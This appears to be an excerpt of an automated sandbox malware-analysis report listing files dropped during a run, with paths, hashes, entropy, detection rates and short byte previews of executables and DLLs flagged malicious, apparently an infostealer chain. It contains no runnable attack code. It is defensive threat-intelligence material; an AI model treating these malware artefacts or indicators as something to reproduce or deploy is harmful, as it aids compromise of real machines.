SHA-512:	F488EDF95EA2D330B8CC41925492B9552F50CF40FDBB9BEC3CAC31C29F7E210E2053002FA915E7ED946533B6A71BC48A8C34A33B70DD66B41D0FAF2CB80751DA
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.3.9.6.5.1.2.5.2.3.6.2.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.3.9.6.5.1.6.4.1.0.1.3.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.a.1.c.a.c.a.-.9.d.8.7.-.4.e.c.3.-.b.d.a.7.-.0.0.b.e.b.9.d.6.f.1.7.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.4.e.2.4.9.a.-.b.7.0.0.-.4.7.1.6.-.8.a.9.1.-.e.f.f.5.5.5.0.0.8.3.2.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.6.V.5.5.6.8.M.q.a.T.g.h.E.r.A.l.f.E.3.0.B.B.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.d.0.-.0.0.0.1.-.0.0.1.4.-.5.8.b.2.-.6.7.8.d.2.4.0.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.0.f.e.6.e.d.e.d.2.d.c.5.d.8.f.0.e.1.4.c.8.0.e.b.c.3.1.c.d.5.d.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.0.f.8.c.8.4.1.d.1.9.7.a.3.d.b.3.6.8.a.3.c.6.4.6.d.2.4.2.5.4.1.e.c.e.1.4.4.b.!.j.6.V.5.5.6.8.M.q.a.T.g.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B9B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Sep 21 12:48:32 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	171450
Entropy (8bit):	3.6951788074884573
Encrypted:	false
SSDEEP:	1536:hTH2QAhGx1LkuG42QCD5WWpJJQujitpN4uE2aO4d7LTg/:hTHPAAxit4s5rNjih4uEq4d7LTg/
MD5:	6F33C293D389C761BC4E904C86BAD7DC
SHA1:	9EB1F31CB08D53303C58AFF4D9F8A2F1C2EE560F
SHA-256:	FA1890546A11E6A9211B372AD6A3CF325596989EEA578FF188E1E6911825F7EC
SHA-512:	497F940EC002347B68E7D9E457B4FB265324E8D55DA8F50046824476A9770A384658B52164FE9F764A11B32CFA0370C8DF97D31BBDBE01F565545F79F24B271D
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ..........f........................\...........$...............67..........`.......8...........T............"...z......................................................................................................eJ..............GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E1D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6462
Entropy (8bit):	3.729660741430982
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbp7mq69aYZrnVqQE/y645aM4UR89bzQsf6xm:R6l7wVeJEq6wYZ4oprR89bzQsf6xm
MD5:	A6A4A0197C8F0F5A73B0893AEF5AB534
SHA1:	2D827B139BD194FF00FBF1A87C7B0CC7877B0F8E
SHA-256:	7CE6C349E2BD7F2DB929A6F5687080710C2FFB8AD9449EBE41E900BAA7316115
SHA-512:	4924B31E8BFACB5A9CBFB97D5E4E64C1805EC7FCD7720EF8F4F0D734CC4186589AE511368608506B2D9778A670B5C59B2431ECBB7428D730596DF8B228C4F3BC
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.8.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E7C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4782
Entropy (8bit):	4.531623848838925
Encrypted:	false
SSDEEP:	48:cvIwWl8zsbJg77aI9aFWpW8VYjhYm8M4J+TXB2Fgt+q8vcXBt6NUT5d:uIjf1I7M07V1J+TPKcy6T5d
MD5:	862E8FAE72E79B32A1215BB72285D80A
SHA1:	046874585B79197A58F51419502D66374F6AB71D
SHA-256:	8D9E124BC52D1766B64EBCF9805136EEE08C017E08B2D594F5F76F5C08BB55F1
SHA-512:	B7E8E5E51BCFF28B2BFDE1AD9E56206A759F43FFA98FE2A70B3B15030794A84E926B8794BC0B865CE43801EB6B938AB4C2DEE4B3597A88EB2F65CA50D620DEA0
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="509991" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EC8.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	86260
Entropy (8bit):	3.0713043134330165
Encrypted:	false
SSDEEP:	1536:R02h3hnf+WdUX3+tExj/lQ2IHPIcTHp5u+d+l+llVCen43wv:R02h3hnf+WdUX3+tExj/lQ2IHPISHp5x
MD5:	6445BE3A49427DB0BC9F65470747331E
SHA1:	C8DBDC01F5F604267C53A999131878A49A05D45A
SHA-256:	22820DD7237C56F4F92AA5FFE0615E172789442E0C8F9E2EB60FFE483332BCB6
SHA-512:	01E275DFFB6CEACCD69304D2496EFA82392E67DC78E41171169B7BA459A64A599625D58AA8A284DD917369020DAA41F317713A9380075E76D4475CC0C2907734
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER85CE.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6851131959189014
Encrypted:	false
SSDEEP:	96:TiZYW056uh4YLYreWa1RHDYEZ2KtaiP32RSKQwNnzU6aM0nSXMn7vAI/x3:2ZDZsZ1GndnaM0ncMn7vX/x3
MD5:	6CE3851C996E9D6233EA97C42A8E5557
SHA1:	882E448ADEA8C1C173FFCE2AD8566FE85E0CA915
SHA-256:	0B00FC6A256C50A221AE9DB2600221AD824D99CD0CB7838FF0DA1924A1612808
SHA-512:	6AE62541074F52DBEBD55A74BF3BEF48D628DC363519E881BAAF001FDB59B37221ED2EB8B89E853BBE116A9F85F6324464B3E9D9F0C983C46CE97DFEA1408AA7
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0E4.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	87720
Entropy (8bit):	3.062081055584417
Encrypted:	false
SSDEEP:	1536:c8hnarYeNoSVG6XzAMyYFR6Hziwk7Rx8713+I+M+f+6+l+FvJ+y+Cve+2+4d+q+O:c8hnarYeNoSVG6XzAMyYFR6Hzix7Rx8B
MD5:	F730173BF8781ECFB4F09D4584BBBA89
SHA1:	F2B3DA792A78BBF8E66F3488725D69246FA3963A
SHA-256:	DC438BB8AA23BB4990ABE8C705B591BEB60F2F93E74A226F7364CA799A5B27C7
SHA-512:	82DC29D4E40797C044C07B02D0EE506F860D827FC2FBBFC373BE958ECED366B1329205200280D4DA8EF8180A20ACFE7F2F3B0A6380BC2E58D2FB4B73001EAC9F
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1B0.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.696077916815462
Encrypted:	false
SSDEEP:	96:TiZYWkmI+5OYpYoHgyHNYEZDsqtaieEeCBw3SOV2l4au0RM7qubInxc:2ZD6OCPSOMyau0RM7quUnxc
MD5:	7F0D3FE9CC54C98FB90A63FCB3F57845
SHA1:	E71FD04E536B6CEB490761ABA1D3C9556356E9A1
SHA-256:	45C5959CBE105DA581B71C5C4ED683EC1A21A1F201DF4E106F52586535C99EBD
SHA-512:	0D015113AC570EB1ED16D55460E7B18A330EBA4018A64C3E793F19A7CB5E86BC5673D3C25D25AF629E803DC95C5B62D9CCE43F91D5344A2B746AED601934305D
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\dv921it45.dat

Download File

Process:	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:V7lln:5
MD5:	26E729340F715230AEB8F44224BBD5DA
SHA1:	A6A2B6EDB6EA62B5B16487D5421BE75038BD733D
SHA-256:	FB3BF5C93F52AC5FA4B43C835449BDA104359DD47D2BC17F0C8CB87B01066F54
SHA-512:	0F0A60A1838C2DDC5884C978DCFDD8396D8E4B4FA0646C681A0D1F9A794CCCA6AA48857CF552FB20527E851E1ABE794DE876F75A5625BDAA54FAA69B4955B891
Malicious:	false
Reputation:	unknown
Preview:	...f....

C:\ProgramData\dv921rc45.dat

Download File

Process:	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:P:P
MD5:	573AEF82DC217FB88080A9162D29E1D1
SHA1:	080112E99D22528031D00129A1297EFC04F88149
SHA-256:	1A00F51F3029FA4B7E61B9BF7AA9DE5A64798857872981F7E056E4F437171955
SHA-512:	AEBC30DC1D9A2A09BEBE39AF0EF73E316A4F633F93545551F012489907C51B023B1BBC62ADDB89A2474387DE868A744D441A420E9416CD98D4324CDCDC5D9A86
Malicious:	false
Reputation:	unknown
Preview:	(...

C:\ProgramData\dv921resa.dat

Download File

Process:	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	2.9545817380615236
Encrypted:	false
SSDEEP:	3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
MD5:	98DDA7FC0B3E548B68DE836D333D1539
SHA1:	D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
SHA-256:	870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
SHA-512:	E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
Malicious:	false
Reputation:	unknown
Preview:	30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

C:\ProgramData\dv921resb.dat

Download File

Process:	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	1.7095628900165245
Encrypted:	false
SSDEEP:	3:LDXdQSWBdMUE/:LLdQSGd
MD5:	4FFFD4D2A32CBF8FB78D521B4CC06680
SHA1:	3FA6EFA82F738740179A9388D8046619C7EBDF54
SHA-256:	EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
SHA-512:	130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
Malicious:	false
Reputation:	unknown
Preview:	dad6f9fa0c8327344d1aa24f183c3767................................................................................................

C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11496960
Entropy (8bit):	7.95681767955623
Encrypted:	false
SSDEEP:	196608:0GTSo6ARyCFMI19DwkfAuYI8wha0mlCGMbM77RWWuhJzoSpc92tQRqIDfrDap1B6:0GTz6uyCfDwkfAuH8kv477RWXJs59Nqs
MD5:	D60D266E8FBDBD7794653ECF2ABA26ED
SHA1:	469ED7D853D590E90F05BDF77AF114B84C88DE2C
SHA-256:	D4DF1ABA83289161D578336E1B7B6DAF7269BB73ACC92BD9DFA2C262EBC6C4D2
SHA-512:	80DF5D568E34DFC086F546E8D076749E58A7230ED1AA33F3A5C9D966809BECADC9922317095032D6E6A7ECDFBFBCE02A72CC82513AB0D132C5FFA6C07682BD87
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54% Antivirus: Virustotal, Detection: 64%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....+.f..........#.................]p.........@.............................`............ .....................................................<....P......@...`*...........................................F..(.......8............... ............................text...6........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..p.-......................... ..`.text1..X...........................@....text2...`.......b..................`..h.rsrc........P.......h..............@..@........................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\jewkkwnf\jewkkwnf.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1075200
Entropy (8bit):	7.828820550765554
Encrypted:	false
SSDEEP:	24576:WdYRGW0Hr/0s93L2wy3Dz39bQw4D68c1y3wYx0DRTejblcicS32UxibH:6YRGWYJqw0DL9swKw18wG0DRTejblci0
MD5:	8C8AF20BF6536903C1D042CEBEDE6475
SHA1:	8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
SHA-256:	B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
SHA-512:	8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42% Antivirus: Virustotal, Detection: 33%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r)..p~....o-...(......t.....+..Vs....(/...t...........(0...*.0..........

C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)

Download File

Process:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1075200
Entropy (8bit):	7.828820550765554
Encrypted:	false
SSDEEP:	24576:WdYRGW0Hr/0s93L2wy3Dz39bQw4D68c1y3wYx0DRTejblcicS32UxibH:6YRGWYJqw0DL9swKw18wG0DRTejblci0
MD5:	8C8AF20BF6536903C1D042CEBEDE6475
SHA1:	8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
SHA-256:	B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
SHA-512:	8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42% Antivirus: Virustotal, Detection: 33%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r)..p~....o-...(......t.....+..Vs....(/...t...........(0...*.0..........

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
